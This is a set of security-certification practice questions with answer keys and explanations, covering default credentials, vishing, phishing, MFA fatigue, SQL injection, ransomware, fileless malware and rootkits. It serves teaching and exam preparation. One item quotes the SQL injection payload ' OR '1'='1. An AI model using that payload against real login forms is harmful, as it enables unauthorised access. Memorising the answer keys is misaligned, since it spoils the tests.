A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?
A.Upgrade OpenSSL immediately, because the reported CVE proves the package is exploitable as installed.
B.Ignore the 8443 service, because the internet firewall already prevents external exposure.
C.Change the default credentials on the internal admin console and restrict access to only approved management hosts.
D.Leave the console as-is and focus only on changing the bind address to 127.0.0.1.
AnswerC
Default credentials on a reachable administrative interface are the highest-risk issue in the list. The console is accessible from the corporate VLAN, so an internal attacker or compromised endpoint could log in immediately without needing a vulnerability exploit. The OpenSSL finding may be a false positive due to backporting, and the firewall already limits internet reach, but default admin/admin credentials create direct compromise risk.
Why this answer
Option C is correct because the most immediate risk is that an attacker on the corporate VLAN can access the internal admin console using default credentials (admin/admin). This bypasses the firewall and allows full control of the application server. Even though OpenSSL has a backported fix, the default credentials represent an active, easily exploitable vulnerability that requires no additional exploit development.
Exam trap
The trap here is that candidates focus on the critical CVE and the firewall rule, overlooking that default credentials on an internally reachable service pose a more immediate and easily exploitable risk than a patched vulnerability or a network control that does not protect against internal threats.
How to eliminate wrong answers
Option A is wrong because the distribution vendor has backported the fix, meaning the installed OpenSSL 3.0.7 is patched against the CVE despite the version number; upgrading is unnecessary and could break dependencies. Option B is wrong because the firewall only blocks internet traffic, but the admin console is reachable from the corporate VLAN, which is a trusted network that may still contain compromised hosts or insider threats. Option D is wrong because changing the bind address to 127.0.0.1 alone does not address the default credentials; an attacker on the local host could still exploit them, and the console would remain accessible to anyone who gains local access.
A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?
A.Smishing, because the attacker is using a text message with a link.
B.Vishing, because the attacker is using voice communication to pressure the user.
C.Baiting, because the attacker is offering a reward to entice the user.
D.Pretexting, because the attacker invented a role and story.
AnswerB
Vishing is voice-based social engineering, including phone calls and voicemail messages that try to pressure the target into revealing information. Requesting a one-time passcode is especially dangerous because it can let an attacker bypass MFA protections. The callback number is often used to appear legitimate and keep the victim engaged long enough to disclose sensitive data.
Why this answer
Option B is correct because vishing (voice phishing) uses voice communication—such as phone calls or voicemails—to trick victims into revealing sensitive information. In this scenario, the attacker leaves a voicemail claiming to be from the security team and pressures the user to read back a one-time passcode, which is a classic vishing tactic that exploits trust and urgency over voice channels.
Exam trap
The trap here is that candidates may confuse vishing with smishing because both involve social engineering over digital communication, but the key differentiator is the medium: voice (voicemail/call) versus text message (SMS).
How to eliminate wrong answers
Option A is wrong because smishing specifically involves SMS text messages, often containing a malicious link, not a voicemail or callback number. Option C is wrong because baiting relies on offering a reward (e.g., free download or USB drive) to entice the victim into an action, not on impersonating authority and creating urgency to extract a passcode.
An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?
A.Smishing
B.Phishing
C.Vishing
D.Pretexting
AnswerB
Phishing uses deceptive messages to trick a user into clicking a link, entering credentials, or taking another unsafe action. This email pretends to be from HR, creates urgency, and tries to push the user into signing in on a fake page.
Why this answer
This is a classic phishing attack because the threat actor uses a deceptive email message to trick the recipient into clicking a malicious link and providing sensitive credentials. Phishing specifically refers to social engineering attacks delivered via email, often leveraging urgency and impersonation of a trusted entity like HR to bypass the victim's critical thinking.
Exam trap
The trap here is that candidates often confuse phishing with vishing or smishing because all three involve impersonation and urgency, but the specific delivery vector (email vs. SMS vs. voice call) is the key differentiator the exam expects you to identify.
How to eliminate wrong answers
Option A is wrong because smishing is a social engineering attack delivered via SMS (Short Message Service) text messages, not email. Option C is wrong because vishing (voice phishing) is conducted over voice calls or VoIP, not through an email message. Option D is wrong because pretexting is a social engineering technique where the attacker fabricates a scenario (pretext) to steal information, but it does not inherently involve a phishing link or email; the attack described specifically uses an email with a link, which is the hallmark of phishing.
A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?
A.Increase password complexity requirements
B.Use phishing-resistant MFA with number matching or hardware security keys
C.Shorten the screen-lock timeout on user devices
D.Allow users to approve any MFA prompt sent during business hours
AnswerB
These controls require stronger user verification and reduce the chance that a simple push approval will defeat MFA.
Why this answer
Option B is correct because phishing-resistant MFA, such as number matching or hardware security keys (e.g., FIDO2/WebAuthn), prevents an attacker from tricking the user into approving a fraudulent push request. Number matching requires the user to enter a number displayed on the login screen into the MFA prompt, ensuring the approval is tied to an actual authentication attempt. Hardware security keys use cryptographic challenge-response, making it impossible for an attacker to replay or intercept the authentication factor.
Exam trap
The trap here is that candidates often confuse MFA fatigue with password-based attacks and incorrectly choose password complexity (A) or screen-lock timeout (C), failing to recognize that the core vulnerability is the user's ability to approve a push without verifying the context.
How to eliminate wrong answers
Option A is wrong because increasing password complexity does not address MFA fatigue or social engineering; the attacker is already bypassing the password by exploiting the MFA approval process. Option C is wrong because shortening the screen-lock timeout only reduces the risk of unauthorized physical access to an unlocked device, but does not prevent the user from approving a fraudulent MFA prompt on their own device. Option D is wrong because allowing users to approve any MFA prompt during business hours directly enables the attack; it removes the user's discretion and encourages blind approval, which is exactly what the attacker is exploiting.
During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?
A.Hide database error messages from the login page only
B.Use parameterized queries or prepared statements
C.Require users to change passwords more often
D.Move the login page to a different URL
AnswerB
Parameterized queries separate user input from SQL commands, which prevents the database from treating input as executable code.
Why this answer
The SQL injection attack ' OR '1'='1 bypasses authentication by always evaluating to true, returning all user records. Parameterized queries (prepared statements) separate SQL logic from user input, preventing the injected string from altering the query structure. This is the industry-standard mitigation for SQL injection vulnerabilities.
Exam trap
The trap here is that candidates often choose hiding error messages (Option A) because they confuse symptom masking with root-cause remediation, but the exam tests the principle that input validation and parameterized queries are the only reliable fix for SQL injection.
How to eliminate wrong answers
Option A is wrong because hiding error messages is a defense-in-depth measure that does not prevent the SQL injection itself; the attack still succeeds even if errors are hidden. Option C is wrong because password rotation policies do not address the root cause of SQL injection; they only reduce the window of compromised credentials. Option D is wrong because moving the login page to a different URL does not fix the vulnerability; the same injection would work on the new URL if the code remains unchanged.
A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?
A.Spyware
B.Ransomware
C.Rootkit
D.Worm
AnswerB
Ransomware encrypts or blocks access to data and demands payment for recovery. Renaming files and leaving ransom notes are classic signs, especially when users can no longer open shared documents.
Why this answer
Ransomware is the correct answer because it specifically encrypts files and demands payment for decryption. The symptoms—documents being renamed, ransom notes appearing, and users losing access to their files—are classic indicators of ransomware activity, which typically uses strong encryption algorithms like AES or RSA to lock files.
Exam trap
The trap here is that candidates may confuse the file-renaming and note-creation behavior with a logic bomb or virus, but the core differentiator is the extortion demand and encryption-based access loss, which is unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware is designed to covertly gather information (e.g., keystrokes, browsing habits) without altering or encrypting files; it does not rename documents or create ransom notes. Option C is wrong because a rootkit provides persistent, stealthy access to a system by hiding its presence (e.g., hooking system calls or modifying kernel data structures), but it does not directly rename files or demand ransoms.
An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?
A.Trojan downloader
B.Fileless malware
C.Rootkit
D.Worm
AnswerB
Fileless malware executes primarily in memory and often uses trusted tools like PowerShell.
Why this answer
The behavior describes PowerShell decoding a command from memory and spawning rundll32.exe without writing any executable to disk, which is the hallmark of fileless malware. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and rundll32) to execute malicious code, and it leaves no persistent file on the filesystem, so activity ceases when the process ends.
Exam trap
CompTIA often tests the misconception that any malware using PowerShell must be a Trojan downloader, but the key differentiator here is the absence of a file written to disk and the memory-only execution, which points directly to fileless malware.
How to eliminate wrong answers
Option A is wrong because a Trojan downloader typically writes a malicious executable to disk and then downloads additional payloads, but here no executable is written to disk. Option C is wrong because a rootkit is designed to hide its presence and maintain persistent kernel-level access, often by modifying system files or drivers, whereas this threat is ephemeral and runs only in user-mode memory without persistence. Option D is wrong because a worm self-replicates across networks to infect other systems, usually by copying itself to remote locations, but this threat does not exhibit self-propagation or network-based replication.
After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?
A.Spyware, because hidden software is often used to collect credentials and data.
B.Rootkit, because it is designed to hide processes, drivers, or sockets from normal security tools.
C.Ransomware, because the server remains operational while still hiding evidence.
D.Logic bomb, because the issue persists after reboot and could trigger later.
AnswerB
Rootkit is the best answer because the core clue is stealth: the service exists, but common tools cannot attribute the socket to a process. That suggests kernel- or driver-level concealment rather than a normal user-space infection. The persistence after reboot further supports a deeply embedded implant that survives simple cleanup attempts.
Why this answer
Option B is correct because a rootkit is specifically designed to hide its presence from the operating system and security tools by intercepting system calls (e.g., those used by netstat and EDR) to conceal processes, drivers, and network sockets. The persistence after reboot and clean firmware integrity checks indicate the rootkit is installed at the kernel or boot level, bypassing user-mode detection.
Exam trap
The trap here is that candidates may confuse persistence with logic bombs or assume that any hidden software is spyware, but the key technical indicator is the ability to hide a socket from netstat and EDR while surviving reboot, which is a hallmark of kernel-level rootkits.
How to eliminate wrong answers
Option A is wrong because spyware typically focuses on data collection and does not inherently possess the capability to hide processes or sockets from netstat and EDR; its stealth is usually limited to user-level concealment, not kernel-level hooking. Option C is wrong because ransomware is designed to encrypt files and demand payment, not to persistently hide processes or sockets; its primary goal is disruption, not stealthy persistence. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event), not a persistent, actively hiding malware that survives reboot and evades process enumeration.